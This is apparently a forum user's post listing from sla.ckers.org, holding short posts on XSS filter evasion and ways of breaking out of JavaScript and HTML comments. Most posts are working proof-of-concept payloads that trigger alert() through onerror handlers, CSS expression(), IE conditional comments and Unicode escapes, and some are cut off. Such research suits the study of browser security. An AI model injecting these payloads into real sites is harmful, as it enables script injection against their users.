Show all posts by user

sla.ckers.org is
ha.ckers sla.cking

Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r!

Go to: Forum List•Message List•New Topic•Log In

Current Page: 1 of 1

Results 1 - 8 of 8

9 months ago

jackmasa

1. Crazy IE comment symbol :]

<style>//*{x:expression(alert(URL=3))}//<style></style> <xmp></xmp>&l
Forum: XSS Info

1 year ago

jackmasa

2. Re: Breaking javascript/html comments

Superver of trick: <script><!-- </script> <img src=1 onerror=alert(1)> the some also: <style><!-- </style> <img src=1 onerror=alert(1)> <textarea><!-- </textarea><img src=1 onerror=alert(1)>
Forum: Obfuscation

1 year ago

jackmasa

3. Re: Breaking javascript/html comments

Gareth of trick: <noscript>
Forum: Obfuscation

1 year ago

jackmasa

4. Re: Breaking javascript/html comments

keep play: <>>//<!/> alert(1)
Forum: Obfuscation

1 year ago

jackmasa

5. Re: Breaking javascript/html comments

Meet the conditions: \uxx2a+\u002f like /*娪/alert(1),娪==\u5a2a or /*帪/
Forum: Obfuscation

1 year ago

jackmasa

6. Breaking javascript/html comments

1.Javascript IE:<script>/*@cc_on!alert(1)//*/</script> Chrome:<script>/*猪/alert(3)//*/</script> All:<script>/ //alert(1)</script> 2.HTML <img/   chrome firefox <!-- ><img src="x:x" onerr
Forum: Obfuscation

1 year ago

jackmasa

7. Re: may by xss in tag a in text ?

hi infinity,"<?php echo chr(12)?>" is a ascii char,equal to javascript:String.fromCharCode(12).
Forum: XSS Info

1 year ago

jackmasa

8. Re: may by xss in tag a in text ?

<?php echo chr(12)?> is also good
Forum: XSS Info

Current Page: 1 of 1

Go to: Forum List•Message List•New Topic•Log In